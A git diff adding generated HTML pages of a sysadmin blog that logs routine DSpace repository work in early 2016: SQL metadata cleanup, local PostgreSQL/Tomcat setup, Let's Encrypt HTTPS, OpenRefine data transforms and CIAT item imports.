+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-01/">January, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-01-13T13:18:00+03:00">Wed Jan 13, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-01-13">2016-01-13</h2>
+<ul>
+<li>Move ILRI collection <code>10568/12503</code> from <code>10568/27869</code> to <code>10568/27629</code> using the <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">move_collections.sh</a> script I wrote last year.</li>
+<li>I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.</li>
+<li>Update GitHub wiki for documentation of <a href="https://github.com/ilri/DSpace/wiki/Maintenance-Tasks">maintenance tasks</a>.</li>
+</ul>
+<h2 id="2016-01-14">2016-01-14</h2>
+<ul>
+<li>Update CCAFS project identifiers in input-forms.xml</li>
+<li>Run system updates and restart the server</li>
+</ul>
+<h2 id="2016-01-18">2016-01-18</h2>
+<ul>
+<li>Change &ldquo;Extension material&rdquo; to &ldquo;Extension Material&rdquo; in input-forms.xml (a mistake that fell through the cracks when we fixed the others in DSpace 4 era)</li>
+</ul>
+<h2 id="2016-01-19">2016-01-19</h2>
+<ul>
+<li>Work on tweaks and updates for the social sharing icons on item pages: add Delicious and Mendeley (from Academicons), make links open in new windows, and set the icon color to the theme&rsquo;s primary color (<a href="https://github.com/ilri/DSpace/issues/157">#157</a>)</li>
+<li>Tweak date-based facets to show more values in drill-down ranges (<a href="https://github.com/ilri/DSpace/issues/162">#162</a>)</li>
+<li>Need to remember to clear the Cocoon cache after deployment or else you don&rsquo;t see the new ranges immediately</li>
+<li>Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account</li>
+<li>Altmetrics&rsquo; support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
+</ul>
+<h2 id="2016-01-21">2016-01-21</h2>
+<ul>
+<li>Still waiting for my IFTTT recipe to fire, two days later</li>
+<li>It looks like the Atom feed on CGSpace hasn&rsquo;t changed in two days, but there have definitely been new items</li>
+<li>The RSS feed is nearly as old, but has different old items there</li>
+<li>On a hunch I cleared the Cocoon cache and now the feeds are fresh</li>
+<li>Looks like there is configuration option related to this, <code>webui.feed.cache.age</code>, which defaults to 48 hours, though I&rsquo;m not sure what relation it has to the Cocoon cache</li>
+<li>In any case, we should change this cache to be something more like 6 hours, as we publish new items several times per day.</li>
+<li>Work around a CSS issue with long URLs in the item view (<a href="https://github.com/ilri/DSpace/issues/172">#172</a>)</li>
+</ul>
+<h2 id="2016-01-25">2016-01-25</h2>
+<ul>
+<li>Re-deploy CGSpace and DSpace Test with latest <code>5_x-prod</code> branch</li>
+<li>This included the social icon fixes/updates, date-based facet tweaks, reducing the feed cache age, and fixing a layout issue in XMLUI item view when an item had long URLs</li>
+</ul>
+<h2 id="2016-01-26">2016-01-26</h2>
+<ul>
+<li>Run nginx updates on CGSpace and DSpace Test (<a href="http://mailman.nginx.org/pipermail/nginx/2016-January/049700.html">1.8.1 and 1.9.10, respectively</a>)</li>
+<li>Run updates on DSpace Test and reboot for new Linode kernel <code>Linux 4.4.0-x86_64-linode63</code> (first update in months)</li>
+</ul>
+<h2 id="2016-01-28">2016-01-28</h2>
+<ul>
+<li>
+<p>Start looking at importing some Bioversity data that had been prepared earlier this week</p>
+</li>
+<li>
+<p>While checking the data I noticed something strange, there are 79 items but only 8 unique PDFs:</p>
+<p>$ ls SimpleArchiveForBio/ | wc -l
+79
+$ find SimpleArchiveForBio/ -iname &ldquo;*.pdf&rdquo; -exec basename {} ; | sort -u | wc -l
+8</p>
+</li>
+</ul>
+<h2 id="2016-01-29">2016-01-29</h2>
+<ul>
+<li>Add five missing center-specific subjects to XMLUI item view (<a href="https://github.com/ilri/DSpace/issues/174">#174</a>)</li>
+<li>This <a href="https://cgspace.cgiar.org/handle/10568/67062">CCAFS item</a> Before:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/01/xmlui-subjects-before.png" alt="XMLUI subjects before"></p>
+<ul>
+<li>After:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/01/xmlui-subjects-after.png" alt="XMLUI subjects after"></p>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-02/index.html b/docs/2016-02/index.html
new file mode 100644
index 000000000..7e244ef26
--- /dev/null
+++ b/docs/2016-02/index.html
@@ -0,0 +1,432 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2016" />
+<meta property="og:description" content="2016-02-05
+
+Looking at some DAGRIS data for Abenet Yabowork
+Lots of issues with spaces, newlines, etc causing the import to fail
+I noticed we have a very interesting list of countries on CGSpace:
+
+
+
+Not only are there 49,000 countries, we have some blanks (25)&hellip;
+Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-02/" />
+<meta property="article:published_time" content="2016-02-05T13:18:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2016"/>
+<meta name="twitter:description" content="2016-02-05
+
+Looking at some DAGRIS data for Abenet Yabowork
+Lots of issues with spaces, newlines, etc causing the import to fail
+I noticed we have a very interesting list of countries on CGSpace:
+
+
+
+Not only are there 49,000 countries, we have some blanks (25)&hellip;
+Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-02/",
+  "wordCount": "1657",
+  "datePublished": "2016-02-05T13:18:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-02/">
+
+    <title>February, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-02/">February, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-02-05T13:18:00+03:00">Fri Feb 05, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-02-05">2016-02-05</h2>
+<ul>
+<li>Looking at some DAGRIS data for Abenet Yabowork</li>
+<li>Lots of issues with spaces, newlines, etc causing the import to fail</li>
+<li>I noticed we have a very <em>interesting</em> list of countries on CGSpace:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/02/cgspace-countries.png" alt="CGSpace country list"></p>
+<ul>
+<li>Not only are there 49,000 countries, we have some blanks (25)&hellip;</li>
+<li>Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;</li>
+</ul>
+<h2 id="2016-02-06">2016-02-06</h2>
+<ul>
+<li>Found a way to get items with null/empty metadata values from SQL</li>
+<li>First, find the <code>metadata_field_id</code> for the field you want from the <code>metadatafieldregistry</code> table:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select * from metadatafieldregistry;
+</code></pre><ul>
+<li>In this case our country field is 78</li>
+<li>Now find all resources with type 2 (item) that have null/empty values for that field:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value=&#39;&#39; OR text_value IS NULL);
+</code></pre><ul>
+<li>Then you can find the handle that owns it from its <code>resource_id</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;22678&#39;;
+</code></pre><ul>
+<li>It&rsquo;s 25 items so editing in the web UI is annoying, let&rsquo;s try SQL!</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value=&#39;&#39;;
+DELETE 25
+</code></pre><ul>
+<li>After that perhaps a regular <code>dspace index-discovery</code> (no -b) <em>should</em> suffice&hellip;</li>
+<li>Hmm, I indexed, cleared the Cocoon cache, and restarted Tomcat but the 25 &ldquo;|||&rdquo; countries are still there</li>
+<li>Maybe I need to do a full re-index&hellip;</li>
+<li>Yep! The full re-index seems to work.</li>
+<li>Process the empty countries on CGSpace</li>
+</ul>
+<h2 id="2016-02-07">2016-02-07</h2>
+<ul>
+<li>Working on cleaning up Abenet&rsquo;s DAGRIS data with OpenRefine</li>
+<li>I discovered two really nice functions in OpenRefine: <code>value.trim()</code> and <code>value.escape(&quot;javascript&quot;)</code> which shows whitespace characters like <code>\r\n</code>!</li>
+<li>For some reason when you import an Excel file into OpenRefine it exports dates like 1949 to 1949.0 in the CSV</li>
+<li>I re-import the resulting CSV and run a GREL on the date issued column: <code>value.replace(&quot;\.0&quot;, &quot;&quot;)</code></li>
+<li>I need to start running DSpace in Mac OS X instead of a Linux VM</li>
+<li>Install PostgreSQL from homebrew, then configure and import CGSpace database dump:</li>
+</ul>
+<pre tabindex="0"><code>$ postgres -D /opt/brew/var/postgres
+$ createuser --superuser postgres
+$ createuser --pwprompt dspacetest
+$ createdb -O dspacetest --encoding=UNICODE dspacetest
+$ psql postgres
+postgres=# alter user dspacetest createuser;
+postgres=# \q
+$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-02-07.backup 
+$ psql postgres
+postgres=# alter user dspacetest nocreateuser;
+postgres=# \q
+$ vacuumdb dspacetest
+$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
+</code></pre><ul>
+<li>After building and running a <code>fresh_install</code> I symlinked the webapps into Tomcat&rsquo;s webapps folder:</li>
+</ul>
+<pre tabindex="0"><code>$ mv /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT.orig
+$ ln -sfv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT
+$ ln -sfv ~/dspace/webapps/rest /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/rest
+$ ln -sfv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/jspui
+$ ln -sfv ~/dspace/webapps/oai /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/oai
+$ ln -sfv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/solr
+$ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
+</code></pre><ul>
+<li>Add CATALINA_OPTS in <code>/opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh</code>, as this script is sourced by the <code>catalina</code> startup script</li>
+<li>For example:</li>
+</ul>
+<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&#34;
+</code></pre><ul>
+<li>After verifying that the site is working, start a full index:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace index-discovery -b
+</code></pre><h2 id="2016-02-08">2016-02-08</h2>
+<ul>
+<li>Finish cleaning up and importing ~400 DAGRIS items into CGSpace</li>
+<li>Whip up some quick CSS to make the button in the submission workflow use the XMLUI theme&rsquo;s brand colors (<a href="https://github.com/ilri/DSpace/issues/154">#154</a>)</li>
+</ul>
+<p><img src="/cgspace-notes/2016/02/submit-button-ilri.png" alt="ILRI submission buttons">
+<img src="/cgspace-notes/2016/02/submit-button-drylands.png" alt="Drylands submission buttons"></p>
+<h2 id="2016-02-09">2016-02-09</h2>
+<ul>
+<li>Re-sync DSpace Test with CGSpace</li>
+<li>Help Sisay with OpenRefine</li>
+<li>Enable HTTPS on DSpace Test using Let&rsquo;s Encrypt:</li>
+</ul>
+<pre tabindex="0"><code>$ cd ~/src/git
+$ git clone https://github.com/letsencrypt/letsencrypt
+$ cd letsencrypt
+$ sudo service nginx stop
+# add port 443 to firewall rules
+$ ./letsencrypt-auto certonly --standalone -d dspacetest.cgiar.org
+$ sudo service nginx start
+$ ansible-playbook dspace.yml -l linode02 -t nginx,firewall -u aorth --ask-become-pass
+</code></pre><ul>
+<li>We should install it in /opt/letsencrypt and then script the renewal script, but first we have to wire up some variables and template stuff based on the script here: <a href="https://letsencrypt.org/howitworks/">https://letsencrypt.org/howitworks/</a></li>
+<li>I had to export some CIAT items that were being cleaned up on the test server and I noticed their <code>dc.contributor.author</code> fields have DSpace 5 authority index UUIDs&hellip;</li>
+<li>To clean those up in OpenRefine I used this GREL expression: <code>value.replace(/::\w{8}-\w{4}-\w{4}-\w{4}-\w{12}::600/,&quot;&quot;)</code></li>
+<li>Getting more and more hangs on DSpace Test, seemingly random but also during CSV import</li>
+<li>Logs don&rsquo;t always show anything right when it fails, but eventually one of these appears:</li>
+</ul>
+<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: Error while processing facet fields: java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>or</li>
+</ul>
+<pre tabindex="0"><code>Caused by: java.util.NoSuchElementException: Timeout waiting for idle object
+</code></pre><ul>
+<li>Right now DSpace Test&rsquo;s Tomcat heap is set to 1536m and we have quite a bit of free RAM:</li>
+</ul>
+<pre tabindex="0"><code># free -m
+             total       used       free     shared    buffers     cached
+Mem:          3950       3902         48          9         37       1311
+-/+ buffers/cache:       2552       1397
+Swap:          255         57        198
+</code></pre><ul>
+<li>So I&rsquo;ll bump up the Tomcat heap to 2048 (CGSpace production server is using 3GB)</li>
+</ul>
+<h2 id="2016-02-11">2016-02-11</h2>
+<ul>
+<li>Massaging some CIAT data in OpenRefine</li>
+<li>There are 1200 records that have PDFs, and will need to be imported into CGSpace</li>
+<li>I created a <code>filename</code> column based on the <code>dc.identifier.url</code> column using the following transform:</li>
+</ul>
+<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1]
+</code></pre><ul>
+<li>Then I wrote a tool called <a href="https://gist.github.com/alanorth/2206f24483fe5f0454fc"><code>generate-thumbnails.py</code></a> to download the PDFs and generate thumbnails for them, for example:</li>
+</ul>
+<pre tabindex="0"><code>$ ./generate-thumbnails.py ciat-reports.csv
+Processing 64661.pdf
+&gt; Downloading 64661.pdf
+&gt; Creating thumbnail for 64661.pdf
+Processing 64195.pdf
+&gt; Downloading 64195.pdf
+&gt; Creating thumbnail for 64195.pdf
+</code></pre><h2 id="2016-02-12">2016-02-12</h2>
+<ul>
+<li>Looking at CIAT&rsquo;s records again, there are some problems with a dozen or so files (out of 1200)</li>
+<li>A few items are using the same exact PDF</li>
+<li>A few items are using HTM or DOC files</li>
+<li>A few items link to PDFs on IFPRI&rsquo;s e-Library or Research Gate</li>
+<li>A few items have no item</li>
+<li>Also, I&rsquo;m not sure if we import these items, will be remove the <code>dc.identifier.url</code> field from the records?</li>
+</ul>
+<h2 id="2016-02-12-1">2016-02-12</h2>
+<ul>
+<li>Looking at CIAT&rsquo;s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I&rsquo;m not sure if we can use those</li>
+<li>265 items have dirty, URL-encoded filenames:</li>
+</ul>
+<pre tabindex="0"><code>$ ls | grep -c -E &#34;%&#34;
+265
+</code></pre><ul>
+<li>I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames</li>
+<li>This python2 snippet seems to work in the CLI, but not so well in OpenRefine:</li>
+</ul>
+<pre tabindex="0"><code>$ python -c &#34;import urllib, sys; print urllib.unquote(sys.argv[1])&#34; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
+CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
+</code></pre><ul>
+<li>Merge pull requests for submission form theming (<a href="https://github.com/ilri/DSpace/pull/178">#178</a>) and missing center subjects in XMLUI item views (<a href="https://github.com/ilri/DSpace/pull/176">#176</a>)</li>
+<li>They will be deployed on CGSpace the next time I re-deploy</li>
+</ul>
+<h2 id="2016-02-16">2016-02-16</h2>
+<ul>
+<li>Turns out OpenRefine has an unescape function!</li>
+</ul>
+<pre tabindex="0"><code>value.unescape(&#34;url&#34;)
+</code></pre><ul>
+<li>This turns the URLs into human-readable versions that we can use as proper filenames</li>
+<li>Run web server and system updates on DSpace Test and reboot</li>
+<li>To merge <code>dc.identifier.url</code> and <code>dc.identifier.url[]</code>, rename the second column so it doesn&rsquo;t have the brackets, like <code>dc.identifier.url2</code></li>
+<li>Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with &ldquo;||&rdquo; in between</li>
+<li>Work on Python script for parsing and downloading PDF records from <code>dc.identifier.url</code></li>
+<li>To get filenames from <code>dc.identifier.url</code>, create a new column based on this transform: <code>forEach(value.split('||'), v, v.split('/')[-1]).join('||')</code></li>
+<li>This also works for records that have multiple URLs (separated by &ldquo;||&rdquo;)</li>
+</ul>
+<h2 id="2016-02-17">2016-02-17</h2>
+<ul>
+<li>Re-deploy CGSpace, run all system updates, and reboot</li>
+<li>More work on CIAT data, cleaning and doing a last metadata-only import into DSpace Test</li>
+<li>SAFBuilder has a bug preventing it from processing filenames containing more than one underscore</li>
+<li>Need to re-process the filename column to replace multiple underscores with one: <code>value.replace(/_{2,}/, &quot;_&quot;)</code></li>
+</ul>
+<h2 id="2016-02-20">2016-02-20</h2>
+<ul>
+<li>Turns out the &ldquo;bug&rdquo; in SAFBuilder isn&rsquo;t a bug, it&rsquo;s a feature that allows you to encode extra information like the destintion bundle in the filename</li>
+<li>Also, it seems DSpace&rsquo;s SAF import tool doesn&rsquo;t like importing filenames that have accents in them:</li>
+</ul>
+<pre tabindex="0"><code>java.io.FileNotFoundException: /usr/share/tomcat7/SimpleArchiveFormat/item_1021/CIAT_COLOMBIA_000075_Medición_de_palatabilidad_en_forrajes.pdf (No such file or directory)
+</code></pre><ul>
+<li>Need to rename files to have no accents or umlauts, etc&hellip;</li>
+<li>Useful custom text facet for URLs ending with &ldquo;.pdf&rdquo;: <code>value.endsWith(&quot;.pdf&quot;)</code></li>
+</ul>
+<h2 id="2016-02-22">2016-02-22</h2>
+<ul>
+<li>To change Spanish accents to ASCII in OpenRefine:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(&#39;ó&#39;,&#39;o&#39;).replace(&#39;í&#39;,&#39;i&#39;).replace(&#39;á&#39;,&#39;a&#39;).replace(&#39;é&#39;,&#39;e&#39;).replace(&#39;ñ&#39;,&#39;n&#39;)
+</code></pre><ul>
+<li>But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac</li>
+<li>On closer inspection, I can import files with the following names on Linux (DSpace Test):</li>
+</ul>
+<pre tabindex="0"><code>Bitstream: tést.pdf
+Bitstream: tést señora.pdf
+Bitstream: tést señora alimentación.pdf
+</code></pre><ul>
+<li>Seems it could be something with the HFS+ filesystem actually, as it&rsquo;s not UTF-8 (<a href="http://www.cio.com/article/2868393/linus-torvalds-apples-hfs-is-probably-the-worst-file-system-ever.html">it&rsquo;s something like UCS-2</a>)</li>
+<li>HFS+ stores filenames as a string, and filenames with accents get stored as <a href="https://blog.vrypan.net/2012/11/13/hfsplus-unicode-and-accented-chars/">character+accent</a> whereas Linux&rsquo;s ext4 stores them as an array of bytes</li>
+<li>Running the SAFBuilder on Mac OS X works if you&rsquo;re going to import the resulting bundle on Mac OS X, but if your DSpace is running on Linux you need to run the SAFBuilder there where the filesystem&rsquo;s encoding matches</li>
+</ul>
+<h2 id="2016-02-29">2016-02-29</h2>
+<ul>
+<li>Got notified by some CIFOR colleagues that the Google Scholar team had contacted them about CGSpace&rsquo;s incorrect ordering of authors in Google Scholar metadata</li>
+<li>Turns out there is a patch, and it was merged in DSpace 5.4: <a href="https://jira.duraspace.org/browse/DS-2679">https://jira.duraspace.org/browse/DS-2679</a></li>
+<li>I&rsquo;ve merged it into our <code>5_x-prod</code> branch that is currently based on DSpace 5.1</li>
+<li>We found a bug when a user searches from the homepage, sorts the results, and then tries to click &ldquo;View More&rdquo; in a sidebar facet</li>
+<li>I am not sure what causes it yet, but I opened an issue for it: <a href="https://github.com/ilri/DSpace/issues/179">https://github.com/ilri/DSpace/issues/179</a></li>
+<li>Have more problems with SAFBuilder on Mac OS X</li>
+<li>Now it doesn&rsquo;t recognize description hints in the filename column, like: <code>test.pdf__description:Blah</code></li>
+<li>But on Linux it works fine</li>
+<li>Trying to test Atmire&rsquo;s series of stats and CUA fixes from January and February, but their branch history is really messy and it&rsquo;s hard to see what&rsquo;s going on</li>
+<li>Rebasing their branch on top of our production branch results in a broken Tomcat, so I&rsquo;m going to tell them to fix their history and make a proper pull request</li>
+<li>Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: <code>'</code> or <code>,</code> or <code>=</code> or <code>[</code> or <code>]</code> or <code>(</code> or <code>)</code> or <code>_.pdf</code> or <code>._</code> etc</li>
+<li>It&rsquo;s tricky to parse those things in some programming languages so I&rsquo;d rather just get rid of the weird stuff now in OpenRefine:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;&#39;).replace(&#39;_=_&#39;,&#39;_&#39;).replace(&#39;,&#39;,&#39;&#39;).replace(&#39;[&#39;,&#39;&#39;).replace(&#39;]&#39;,&#39;&#39;).replace(&#39;(&#39;,&#39;&#39;).replace(&#39;)&#39;,&#39;&#39;).replace(&#39;_.pdf&#39;,&#39;.pdf&#39;).replace(&#39;._&#39;,&#39;_&#39;)
+</code></pre><ul>
+<li>Finally import the 1127 CIAT items into CGSpace: <a href="https://cgspace.cgiar.org/handle/10568/35710">https://cgspace.cgiar.org/handle/10568/35710</a></li>
+<li>Re-deploy CGSpace with the Google Scholar fix, but I&rsquo;m waiting on the Atmire fixes for now, as the branch history is ugly</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-03/index.html b/docs/2016-03/index.html
new file mode 100644
index 000000000..d59d7afd8
--- /dev/null
+++ b/docs/2016-03/index.html
@@ -0,0 +1,370 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2016" />
+<meta property="og:description" content="2016-03-02
+
+Looking at issues with author authorities on CGSpace
+For some reason we still have the index-lucene-update cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module
+Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-03/" />
+<meta property="article:published_time" content="2016-03-02T16:50:00+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2016"/>
+<meta name="twitter:description" content="2016-03-02
+
+Looking at issues with author authorities on CGSpace
+For some reason we still have the index-lucene-update cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module
+Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-03/",
+  "wordCount": "1581",
+  "datePublished": "2016-03-02T16:50:00+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-03/">
+
+    <title>March, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
